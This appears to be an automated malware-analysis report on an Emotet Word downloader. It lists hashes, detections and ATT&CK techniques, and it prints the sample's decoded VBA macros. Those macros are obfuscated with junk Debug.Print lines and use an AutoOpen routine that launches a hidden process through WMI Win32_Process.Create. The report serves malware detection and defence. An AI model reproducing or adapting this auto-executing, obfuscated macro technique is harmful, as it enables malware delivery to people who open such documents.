Emotet Office (OLE) malware analysis — malicious · 4ba4494c6ed0b598

MALICIOUS

Office (OLE)

131.2 KB Created: 2019-05-28 13:54:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 2184a122c44fe044952eba216fb82c76 SHA-1: 26263ad75cce18c6fdfa6955026beae4a3140a3e SHA-256: 4ba4494c6ed0b5983dc9379002db7830de8cb697f34e46dbbf15c7d7c1c67ec2

222 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-10001946-0', indicating it's a downloader for the Emotet family. High-severity heuristics confirm the presence of VBA macros, specifically an AutoOpen macro that utilizes CreateObject, a common technique for executing malicious code. The AutoOpen macro is obfuscated but its presence and the CreateObject call strongly suggest it's designed to download and execute a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5465 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5465 bytes
SHA-256: `8917f592740c5a97fa32c73bf42bcf25a1979d28e96f9ab1addff82a6f05a24b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "ZizB7C0, 0, 0, MSForms, ComboBox" Attribute VB_Control = "opNcpX7, 1, 1, MSForms, ComboBox" Attribute VB_Control = "jTwZf7i, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) Debug.Print "J23uq3Xf" + ("KN8umcO") + "T21Mjc2" + "owNi0nG" + "KKtjm4" + ("pD1zsm" + ("mBVoTS")) Debug.Print "lsNHoPU" + ("SBPzzO9O") + "pZzELvQ" + "n0w6WG1" + ("rriuN1Wl" + "wzYZFnB") XljlAI Debug.Print "C66c1os7" + ("r1jwDDp") + "dD1L7G" + "SVSjLvXz" + "Jnp1F4X" + ("mB5ZbES" + ("Lu_VmtWl")) Debug.Print "iEL_BsdT" + ("w8w0di5c") + "Z4zdmSW2" + "YfrfRjjC" + ("wvsO8Q7B" + "q6pVYz") End Sub Attribute VB_Name = "iQIiph_d" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "IViVi4R" Attribute VB_Name = "EYvKQi" Attribute VB_Name = "j975iQsh" Attribute VB_Name = "BXVHH6ES" Attribute VB_Name = "BX0q4jEU" Attribute VB_Name = "ivMlb9Gw" Attribute VB_Name = "AAYKOrKz" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "CUD4ZfK3" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "okiKDdw6" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "juYiPB" Function XljlAI() C9dAoV0 = ThisDocument.opNcpX7 + ThisDocument.jTwZf7i + ThisDocument.ZizB7C0 Debug.Print "sm_mmNp6" + ("fJlAT6K") + "k2lqhfqJ" + "FmL090" + "fl1iRVKV" + ("HrQ2CpY4" + ("XH8EjwY0")) Debug.Print "hCmPjh" + ("iQjLL3") + "tPkjkEt" + "Zov_f8" + ("HKHFASjs" + "AaR7EF") tb5jnov = "win" Debug.Print "LzmfGj" + ("RijjOiF") + "ttaSSj" + "vqLcAi" + "wV1Lu3t" + ("ltKmzYSJ" + ("Y6z7Nl")) Debug.Print "rIFV77" + ("HQ4VAA") + "d22nIR" + "NZIiIZ" + ("Yq5L5Yz" + "YPCQYJd") CjP2GbIX = tb5jnov + "mgmts:Win" + "32_Process" Debug.Print "dafZvM" + ("ojsZcB") + "wS4wJCVh" + "RbT1l3" + "OL1iXG9U" + ("o0jfEk7w" + ("AhE08r3")) Debug.Print "w72fwui7" + ("o1zwjvdh") + "m6zkYpv" + "fqPHfU38" + ("nhof1jqM" + "LdJBdEB") w3kN3tLj(CjP2GbIX).Create# C9dAoV0, G_aEzP, fSpQdQS, Qcrz_zE1 Debug.Print "VFulswPp" + ("Absnd_") + "OJA2p50J" + "tLq5c3" + "hDRBLB" + ("DcbTpn" + ("XXtib2n")) Debug.Print "wz0kG026" + ("vjQ00Tl") + "ljmP_Kc" + "IqwbuG" + ("di9ilY" + "O_MYuP") End Function Attribute VB_Name = "rXWh_a" Function fSpQdQS() Debug.Print "JT13vJ4" + ("CJCkcOhr") + "wNFYZFoP" + "oHTz5Zk" + "zqVlr9Wr" + ("YqWYYRL" + ("VzG5q6I7")) Debug.Print "jDpt9M" + ("jYbCYGm") + "Vu6htSpY" + "opriCjd3" + ("zZLKpjti" + "AR9CtL7") tb5jnov = zUATc971 + "win" + vOC56Bj Debug.Print "bsELGG" + ("aIOZ9Fp") + "wcvaW3j" + "XC_3F8" + "OdvGVTt" + ("tTiLPiF7" + ("OwL1jS")) Debug.Print "KnoCSPV" + ("MPnJBv") + "NVJNi67b" + "sGoOwjpj" + ("rBS1bX" + "BFQAl2Q9") CjP2GbIX = tb5jnov + "mgmts:Win" + ltmkYiri + "32_Process" + "Startup" Debug.Print "iJSsaD" + ("G8CRR0dC") + "UH78liM" + "AiHuiEuq" + "C2EuOz" + ("QWju68C" + ("HoiujuJ")) Debug.Print "AMiNhS" + ("ptTXrKM7") + "UQjLsv" + "BPjjH7w" + ("KIHzNFLI" + "NdiVzpZ") Set fSpQdQS = w3kN3tL ... (truncated)

SHA-256: 8917f592740c5a97fa32c73bf42bcf25a1979d28e96f9ab1addff82a6f05a24b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "ZizB7C0, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "opNcpX7, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "jTwZf7i, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   Debug.Print "J23uq3Xf" + ("KN8umcO") + "T21Mjc2" + "owNi0nG" + "KKtjm4" + ("pD1zsm" + ("mBVoTS"))
Debug.Print "lsNHoPU" + ("SBPzzO9O") + "pZzELvQ" + "n0w6WG1" + ("rriuN1Wl" + "wzYZFnB")
XljlAI
   Debug.Print "C66c1os7" + ("r1jwDDp") + "dD1L7G" + "SVSjLvXz" + "Jnp1F4X" + ("mB5ZbES" + ("Lu_VmtWl"))
Debug.Print "iEL_BsdT" + ("w8w0di5c") + "Z4zdmSW2" + "YfrfRjjC" + ("wvsO8Q7B" + "q6pVYz")
End Sub


Attribute VB_Name = "iQIiph_d"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "IViVi4R"

Attribute VB_Name = "EYvKQi"

Attribute VB_Name = "j975iQsh"

Attribute VB_Name = "BXVHH6ES"

Attribute VB_Name = "BX0q4jEU"

Attribute VB_Name = "ivMlb9Gw"

Attribute VB_Name = "AAYKOrKz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CUD4ZfK3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "okiKDdw6"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "juYiPB"
Function XljlAI()
C9dAoV0 = ThisDocument.opNcpX7 + ThisDocument.jTwZf7i + ThisDocument.ZizB7C0
   Debug.Print "sm_mmNp6" + ("fJlAT6K") + "k2lqhfqJ" + "FmL090" + "fl1iRVKV" + ("HrQ2CpY4" + ("XH8EjwY0"))
Debug.Print "hCmPjh" + ("iQjLL3") + "tPkjkEt" + "Zov_f8" + ("HKHFASjs" + "AaR7EF")
tb5jnov = "win"
   Debug.Print "LzmfGj" + ("RijjOiF") + "ttaSSj" + "vqLcAi" + "wV1Lu3t" + ("ltKmzYSJ" + ("Y6z7Nl"))
Debug.Print "rIFV77" + ("HQ4VAA") + "d22nIR" + "NZIiIZ" + ("Yq5L5Yz" + "YPCQYJd")
CjP2GbIX = tb5jnov + "mgmts:Win" + "32_Process"
   Debug.Print "dafZvM" + ("ojsZcB") + "wS4wJCVh" + "RbT1l3" + "OL1iXG9U" + ("o0jfEk7w" + ("AhE08r3"))
Debug.Print "w72fwui7" + ("o1zwjvdh") + "m6zkYpv" + "fqPHfU38" + ("nhof1jqM" + "LdJBdEB")
w3kN3tLj(CjP2GbIX).Create# C9dAoV0, G_aEzP, fSpQdQS, Qcrz_zE1
   Debug.Print "VFulswPp" + ("Absnd_") + "OJA2p50J" + "tLq5c3" + "hDRBLB" + ("DcbTpn" + ("XXtib2n"))
Debug.Print "wz0kG026" + ("vjQ00Tl") + "ljmP_Kc" + "IqwbuG" + ("di9ilY" + "O_MYuP")
End Function

Attribute VB_Name = "rXWh_a"
Function fSpQdQS()
   Debug.Print "JT13vJ4" + ("CJCkcOhr") + "wNFYZFoP" + "oHTz5Zk" + "zqVlr9Wr" + ("YqWYYRL" + ("VzG5q6I7"))
Debug.Print "jDpt9M" + ("jYbCYGm") + "Vu6htSpY" + "opriCjd3" + ("zZLKpjti" + "AR9CtL7")
tb5jnov = zUATc971 + "win" + vOC56Bj
   Debug.Print "bsELGG" + ("aIOZ9Fp") + "wcvaW3j" + "XC_3F8" + "OdvGVTt" + ("tTiLPiF7" + ("OwL1jS"))
Debug.Print "KnoCSPV" + ("MPnJBv") + "NVJNi67b" + "sGoOwjpj" + ("rBS1bX" + "BFQAl2Q9")
CjP2GbIX = tb5jnov + "mgmts:Win" + ltmkYiri + "32_Process" + "Startup"
   Debug.Print "iJSsaD" + ("G8CRR0dC") + "UH78liM" + "AiHuiEuq" + "C2EuOz" + ("QWju68C" + ("HoiujuJ"))
Debug.Print "AMiNhS" + ("ptTXrKM7") + "UQjLsv" + "BPjjH7w" + ("KIHzNFLI" + "NdiVzpZ")
Set fSpQdQS = w3kN3tL
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.